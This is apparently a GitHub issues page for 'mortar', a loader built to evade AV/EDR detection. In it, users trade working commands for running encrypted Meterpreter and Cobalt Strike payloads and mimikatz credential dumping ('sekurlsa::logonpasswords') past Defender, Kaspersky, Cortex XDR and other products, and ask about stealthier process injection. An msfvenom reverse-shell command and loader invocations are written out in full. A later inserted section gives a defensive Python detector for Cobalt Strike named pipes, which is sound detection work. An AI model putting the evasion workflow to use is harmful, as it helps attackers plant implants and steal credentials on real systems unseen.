0xsp-srd / mortar
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
License: MIT License
Both agressor and deliver are detected by Windows Defender.
First, I tried to encrypt an exe. The encryptor works fine, but when I load it on the target machine it loads and doesn't show errors; when I get back to the attacker machine, nothing has happened.
Second, I tried to use the shellcode by following the instructions in https://0xsp.com/offensive/mortar-loader-v2/ and it is not working either; please review your code.
Note: I've tried both on a Windows target.
Is there a way to have the compile instructions?
The Lazarus project doesn't really provide instructions on how to compile a project, and neither does the GitHub page for this release.
While compiling agressor with the release version, it shows three errors:
syscalls.RPM(PI.hProcess, Pointer(CONT.rdx + $100), @addr, 4, Ret);
// runner.pas(134,52) Error: identifier idents no member "rdx"
syscalls.W_M(PI.hProcess, LPVOID(CONT.rdx + $10), @ImageBASE, 8, Ret);
// runner.pas(179,53) Error: identifier idents no member "rdx"
CONT_B.rcx := dword64(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
// runner.pas(190,22) Error: identifier idents no member "rcx"
I'm running a fresh Windows 10, updated, with all Defender protection disabled for testing.
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
I can't seem to get the shellcode or shell binary to execute.
For example, create the shell:
root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.x.x.x LPORT=8080 -f exe -o shell64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 713 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe
At this point, manually executing the binary connects fine: Meterpreter session 1 opened (172.x.x.x:8080 -> 127.0.0.1)
However, encrypting and running with rundll32 doesn't work...
C:\Users\user\Desktop>C:\Users\user\Documents\GitHub\mortar\Encryptor\encryptor.exe -f shell64.exe -o bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a
[+] Encrypting the binary ...
[!] content is written to bin.enc
C:\Users\user\Desktop> rundll32.exe agressor.dll,start
At this point, I don't see any network traffic on the victim host.
It appears to trigger werfault.exe
C:>deliver.exe -d -f bin.enc
Exception at 0000000100010930: EReadError:
Stream read error
There is a little problem in your README: it is "sekurlsa::logonpasswords", not "sekurlasa::logonpasswords".
deliver.exe -d -c sekurlasa::logonpasswords -f mimikatz.enc --->deliver.exe -d -c sekurlsa::logonpasswords -f mimikatz.enc
And then, I want to confirm one thing. I tested this command: deliver.exe -d -c version -f bin.enc
and it executed successfully, but it triggered Kaspersky (maybe a memory scan) after a few seconds. You also tested this, as mentioned in your article; didn't this problem occur at the time?
Hi,
Mortar is an awesome project! But I have some trouble: I get an error, "encryptor has not main source file", when I use Kali to build the encryptor project. I don't know why. Can you provide an encryptor file and a calc.enc file? Thank you please ~
I've got the bin.enc, but where is the DLL?
Hi,
Firstly, absolutely love the work! Very much appreciate it.
Is there any way to make the injection process stealthier? At the moment, a cmd window is launched and simply stays there; closing it also ends the Meterpreter session. I've attempted to recompile the loader and inject into different processes such as 'svchost.exe' and 'explorer.exe' via
bin_decryptor('c:\\windows\\explorer.exe');
or fork_P_x64('C:\\windows\\explorer.exe',runner.TByteArray(AMemStr2.memory),processhandle);
yet only the cmd window opens, nothing else, and again closing the cmd window ends the session.
Also, I know literally nothing about the Pascal language.
Does this work on .NET payloads? I also have issues following the README. I compiled each of them in their individual folders, but I still couldn't figure out how to use it. I don't know the Pascal programming language.
Hello, the DLL was deleted by Defender; the .enc file was not deleted.
You are able to pass commands to the loaded binary.
You deleted the exe; how do I pass the command?
I need the program to receive commands.
bin.enc is an encrypted CS Beacon. I tried to create the following batch file and launch it:
@echo off
cmd.exe /c rundll32.exe agressor.dll,stealth
The Beacon connection failed and Cortex XDR blocked it with "Rule ioc.cobalt_strike_named_pipe".
Any idea? Thanks.
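A rule name like the one quoted above points at the Beacon's named pipe rather than at the loader: the encryption hides the Beacon bytes on disk, but a Beacon that still creates its stock pipe names is visible to the EDR no matter how it was loaded. As an added example (not code from the mortar project or from this thread), the routine below flags Sysmon pipe events (Event ID 17, pipe created, and 18, pipe connected) whose PipeName matches the documented Cobalt Strike defaults (MSSE-<n>-server for artifact-kit binaries, msagent_<hex> for SMB beacons, postex_<hex> for post-exploitation jobs). The log lines are constructed for this example, not real telemetry, and the one-line "key: value" rendering of the events is an assumption of this example rather than Sysmon's native XML.

```python
"""Added example: flag Sysmon pipe events whose PipeName matches a
Cobalt Strike default pipe pattern.  Not part of the mortar project.

Assumptions (this example's, not the page's):
  * the pipe patterns are the stock Cobalt Strike defaults
    (MSSE-<n>-server, msagent_<hex>, postex_<hex>);
  * events arrive as one "Key: value, Key: value" line each;
  * SAMPLE_LOG is constructed data, not captured telemetry.
"""
import re
from typing import Dict, List, Optional

# Default Cobalt Strike pipe names, as they appear in Sysmon's PipeName
# field (leading backslash, no \\.\pipe\ prefix).  Case-insensitive because
# named pipes are case-insensitive on Windows.
DEFAULT_CS_PIPES = {
    "artifact_kit": re.compile(r"^\\MSSE-\d+-server$", re.IGNORECASE),
    "smb_beacon":   re.compile(r"^\\msagent_[0-9a-f]+$", re.IGNORECASE),
    "postex_job":   re.compile(r"^\\postex_[0-9a-f]{4}$", re.IGNORECASE),
}

# Pipe events: 17 = PipeEvent (Pipe Created), 18 = PipeEvent (Pipe Connected).
PIPE_EVENT_IDS = {"17", "18"}

# Minimal parser for the one-line "Key: value, Key: value" rendering used by
# SAMPLE_LOG.  Values run up to the next comma, so Windows paths (which
# contain "C:\" but no commas) survive intact.
FIELD_RE = re.compile(r"(\w+): ([^,]+)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one rendered event line into a field dictionary."""
    return {key: value.strip() for key, value in FIELD_RE.findall(line)}


def classify_pipe(pipe_name: str) -> Optional[str]:
    """Return the CS default family a pipe name matches, or None."""
    for family, pattern in DEFAULT_CS_PIPES.items():
        if pattern.match(pipe_name):
            return family
    return None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per pipe event whose PipeName matches a CS default."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") not in PIPE_EVENT_IDS:
            continue  # process creation, network, etc. carry no PipeName
        family = classify_pipe(event.get("PipeName", ""))
        if family is None:
            continue
        hits.append({
            "event": event["EventID"],
            "family": family,
            "pipe": event["PipeName"],
            "image": event.get("Image", ""),
        })
    return hits


# Constructed sample events (not real telemetry).  Lines 1 and 4 are the
# kind of pipe activity a stock Beacon produces; lines 2 and 5 are benign
# pipes from Chrome and PowerShell; line 3 is a process-creation event.
SAMPLE_LOG = [
    r"EventID: 17, UtcTime: 2023-01-01 10:00:00.000, ProcessId: 4120, PipeName: \MSSE-3143-server, Image: C:\Windows\System32\rundll32.exe",
    r"EventID: 17, UtcTime: 2023-01-01 10:00:01.000, ProcessId: 7136, PipeName: \mojo.7136.1.1, Image: C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"EventID: 1, UtcTime: 2023-01-01 10:00:02.000, ProcessId: 4120, Image: C:\Windows\System32\rundll32.exe, CommandLine: rundll32.exe agressor.dll,stealth",
    r"EventID: 18, UtcTime: 2023-01-01 10:00:03.000, ProcessId: 4120, PipeName: \postex_1a2b, Image: C:\Windows\System32\rundll32.exe",
    r"EventID: 17, UtcTime: 2023-01-01 10:00:04.000, ProcessId: 5012, PipeName: \PSHost.133170000.5012.DefaultAppDomain.powershell, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"EventID {hit['event']}: {hit['family']:<12} {hit['pipe']:<24} {hit['image']}")
```

The point for anyone repeating the setup in this post: changing the pipe name in the Malleable C2 profile (or using a non-default post-ex pipe) is a separate step from encrypting the Beacon, and the encrypted loader does nothing about the pipe-name indicator.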
From today, Microsoft Defender started detecting it as a virus tool with the label VirTool/Win64Mortar :\
Hello lawrenceamer, hope you are well.
I have a question: how can I call the export function "dec" and execute it when I have injected the DLL into the "cmd.exe" process? Or what is the technique, the reflective injector you used to do that?
Because when I injected the DLL into the cmd.exe process, it was just injected and didn't execute the "dec" function to run the ".enc" payload.
I'm having the same issue as nathan-bowman. The encryptor works. I compile the DLL, but I can't run it. I have compiled it on 3 different systems (all Windows x64: one Windows 10, two Windows 11; one bare-metal, two VMs). I've tried to run it with the mimikats.enc (rundll32.exe agressor.dll,start), also on multiple machines. Nothing happens.
Hi, this works amazingly well with mimikatz against multiple antivirus products that I have tested (Windows Defender, McAfee, ESET, Norton, Bitdefender and Avast).
But I still have a question: is there a way we could apply this technique to other tools that run once, such as WinPEAS or PowerUp?
Following situation: I'm generating a Windows executable through Cobalt Strike, then I encrypt that file with the encryptor and load it with deliver.exe. AV did not recognize anything; the beacon connects and then exits pretty fast after calling home:
[*] Tasked beacon to run: whoami
[+] host called home, sent: 45 bytes
[+] beacon exit.
Tried multiple times but no chance to get it working. Any idea?